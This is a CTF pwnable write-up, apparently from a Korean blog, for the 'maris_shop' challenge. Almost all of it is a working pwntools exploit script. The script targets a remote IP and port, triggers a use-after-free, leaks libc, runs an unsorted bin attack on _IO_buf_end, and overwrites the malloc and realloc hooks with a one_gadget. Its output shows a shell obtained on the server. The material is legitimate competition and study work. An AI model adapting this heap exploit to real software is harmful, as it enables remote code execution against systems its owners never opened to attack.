Category : pwnable
Summary : use-after-free, unsorted bin attack, _IO_buf_end
Exploit
#!/usr/bin/python
from pwn import *
def cmd_add(amount, target=None):
global inventory
choice = 0
ru('choice:')
sl(str(1))
rl()
for i in range(0, 6):
line = rl(False).split('---- ')
name = line[0][3:].strip()
price = int(line[1])
if target:
if target == name:
choice = i + 1
break
else:
continue
else:
if inventory and name in inventory:
continue
else:
inventory.append(name)
choice = i + 1
break
ru('Which item?:')
sl(str(choice))
if choice:
ru(':')
sl(str(amount))
return 1
else:
ru('No such item!\n')
return 0
def cmd_remove(idx):
ru('choice:')
sl(str(2))
ru('Which item?:')
sl(str(idx))
def cmd_show(idx):
ru('choice:')
sl(str(3))
ru('choice:')
sl(str(1))
ru('item?:')
sl(str(idx))
ru('Name: ')
name = rl(False).strip()
ru('Price: ')
price = int(rl(False))
ru('Amount: ')
amount = int(rl(False))
return name, price, amount
def cmd_buy(idx):
ru('choice:')
sl(str(4))
ru('choice:')
if idx == -1:
sl(str(2))
ru('Do you want to clear your cart?')
sl(str('1'))
else:
sl(str(1))
ru('Which item?:')
sl(str(idx))
#s = process('./maris_shop')
s = remote('110.10.147.102', 7767)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
inventory = []
####### manipulate user money #######
cmd_add(-0xffffff)
cmd_buy(0)
######################################
########### fill inventory ###########
for i in range(0, 16):
while not cmd_add(1): pass
cmd_remove(i)
inventory.pop()
while not cmd_add(1): pass
cmd_buy(0)
while not cmd_add(1): pass
######################################
############# trigger UAF ############
cmd_buy(-1) # free all
inventory = inventory[-1:]
######################################
# 15 | dummy | 0 | dummy | 1 | dumm | 2 | dumm | .....
############ memory leak #############
name, _, libc_leak = cmd_show(15)
libc_base = libc_leak - 0x3c4b78
libc_stdin_buf_end = libc_base + 0x3c4920
libc_realloc_n = libc_base + 0x0846D0
'''
.text:00000000000846D4 mov rax, cs:__realloc_hook_ptr
.text:00000000000846DB mov rax, [rax]
.text:00000000000846DE test rax, rax
.text:00000000000846E1 jnz loc_848E8
.text:00000000000848E8 mov rdx, [rsp+68h]
.text:00000000000848ED call rax
'''
libc_one_gadget = libc_base + 0x4526a
'''
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
'''
_IO_stdfile_0_lock = libc_base + 0x3c6790
_IO_wide_data_0 = libc_base + 0x3c49c0
_IO_file_jumps = libc_base + 0x3c36e0
_IO_wfile_jumps = libc_base + 0x3c3260
print hex(libc_base)
########################################
########### unsorted bin attack ########
for i in range(14):
while not cmd_add(1) : pass
amount = (libc_stdin_buf_end - 0x10) - libc_leak
while not cmd_add(amount, target=name) : pass
while not cmd_add(1) : pass
########################################
##### overwrite __malloc_hook && trigger ######
choice = 0
first_chance = True
while not choice:
ru('choice:')
if first_chance:
pay = ''
pay += '1\x00\x00\x00\x00'
pay += p64(_IO_stdfile_0_lock) + p64(0xffffffffffffffff)
pay += p64(0) + p64(_IO_wide_data_0)
pay += p64(0) + p64(0)
pay += p64(0) + p64(0xffffffff)
pay += p64(0) + p64(0)
pay += p64(_IO_file_jumps) + p64(0)
pay += (p64(0) + p64(0)) * 18
pay += p64(0) + p64(_IO_wfile_jumps)
pay += p64(0) + p64(0)
pay += p64(libc_one_gadget) + p64(libc_realloc_n) # __realloc_hook / __malloc_hook
sl(pay)
else:
sl(str(1))
rl()
choice = 0
for i in range(0, 6):
line = rl(False).split('---- ')
name = line[0][3:].strip()
price = int(line[1])
if inventory and name in inventory:
continue
else:
choice = i + 1
break
ru('Which item?:')
sl(str(choice))
if choice:
s.interactive()
##################################################
s.close()
$ python exploit.py
[+] Opening connection to 110.10.147.102 on port 7767: Done
0x7f29b6411000
[*] Switching to interactive mode
$ id
uid=1000(mari) gid=1000(mari) groups=1000(mari)
'CTF > 2019' 카테고리의 다른 글
| 0CTF 2019 - Fast&Furious (0) | 2019.07.21 |
|---|---|
| 0CTF 2019 - Fast&Furious2 (0) | 2019.07.21 |
| CODEGATE 2019 QUAL - cg_casino (1) | 2019.01.31 |
| CODEGATE 2019 QUAL - god-the-reum (0) | 2019.01.29 |